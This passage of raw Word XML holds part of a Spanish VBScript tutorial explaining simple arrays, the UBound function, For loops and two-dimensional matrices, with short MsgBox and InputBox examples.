        </w:rPr>
        <w:t xml:space="preserve"> (de echo, podemos usar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w: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0) = CreateObject(“Scripting.FileSystemObject”)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si queremo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pues, más o menos entendido el funcionamiento de los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arrays simples</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, es hora de presentaros una función muy útil en estos casos: La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dim </w:t>
      </w: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7)</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sgBox “El Array tiene “Ubound(Variable)+1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“ posiciones</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.”,0, “SubArray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podemos intuir del ejemplo, la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplicada al conjunto de un Array, devuelve el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>número que habíamos usado al declararla</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, o lo que es lo mismo, las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>posiciones -1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que tiene el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Array simple</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esto se puede usar con el bucle For para escribir/leer en todos los elementos del Array:</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Variable=InputBox (“Introduce un número…”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,”Numero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>…”,”Numero…”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="93" w:right="5628"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dim miArray(Variable) For x=0 To UBound(miArray)</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miArray(x)=5</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Next</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sgBox “Hay </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“ &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubound(miArray)+1 “ numeros 5.”</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ueno, vemos aquí dos novedades, en primer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lugar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dimensión</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del Array puede darla una variable (en este caso Variable que recibe su valor de un InputBox) y que la función UBound se usa para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>recorrer todo el Array</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si x=0, para x=1 en el bucle For, debería ser UBound + 1. Vemos pues, la utilidad de los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> simples, pues aparte de ser usados como </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>variable independientes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pueden ser usada en conjunto (aparte de reducir la cantidad de variables a crear, creando grupos de ellas, por ejemplo).</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Hemos estado hablando todo el rato de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arrays simples</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo cual quiere decir que hay </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>más tipos de Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que los vistos hasta ahora (que se queden claros estos antes de continuar). Otros tipos de Arrays son las matrices. Estoy seguro que a los que han dado bachillerto les suena, porque es exactamente eso. Para los demás explico: Un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Array simple tiene X elementos en una dirección</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, como hemos visto en el esquema anterior; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>una Matriz tiene X elementos en una dirección e Y en otra</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, creando algo así (supongamos que los cuadrados son iguales y están alineados a la perfección</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>):´</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2938"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1761490" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10746" name="Picture 10746"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10746" name="Picture 10746"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1761490" cy="120015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Como vemos, la forma de crear una matriz es poner </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dim Variable(Largo-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1,Alto</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-1),</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de forma que si ponemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dim Variable(3,3),</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tendremos una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matriz de 4x4</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4 filas y 4 columnas). Por lo demás el funcionamiento es el mismo, pero con dos dimensiones en vez de una:</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2,1)</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0,0)=4</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1,1)=3</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0,1) = “Hola”</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1,0) = Now</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2,0) = Len(Variable(0,1)</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Variable(2,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable(2,0)/Variable(0,0)</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s, esta vez indicamos la posición con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>X,Y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matriz</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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, de forma que si sigues todas las operaciones deberá darte algo así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2938"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1761490" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10787" name="Picture 10787"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10787" name="Picture 10787"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1761490" cy="120015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a forma conseguimos trabajar con las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matrices</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tened en cuent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la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Matriz </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">es 4,4 por ejemplo, tendría 5 filas y 5 columnas numeradas desde 0,0 hasta 4,4; lo que hace un total de 25 que podemos usar. En definitiva, la diferencia entre los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Arrays </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">simples y estos, es que aquí tiene </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dos dimensiones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en vez de un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Nos olvidamos de algo muy importante, y es que la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve un número, que es el que hemos introducido al declarar el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pero las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matrices</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tienen 2, lo cual requiere una reexplicación de la función:</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MiMatriz(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2,3)</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MiArray(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>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sgBox “El array tiene </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“ &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubound(MiArray) &amp; “ posiciones, y la Matriz “ &amp; Ubound(MiMatriz) &amp;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ejecutamos esto obtendremos “El Array tiene 5 posiciones y la Matriz 2”. Lo cual quiere decir que la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve el primer número de la Matriz, es decir, el número que indica las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>X</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lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
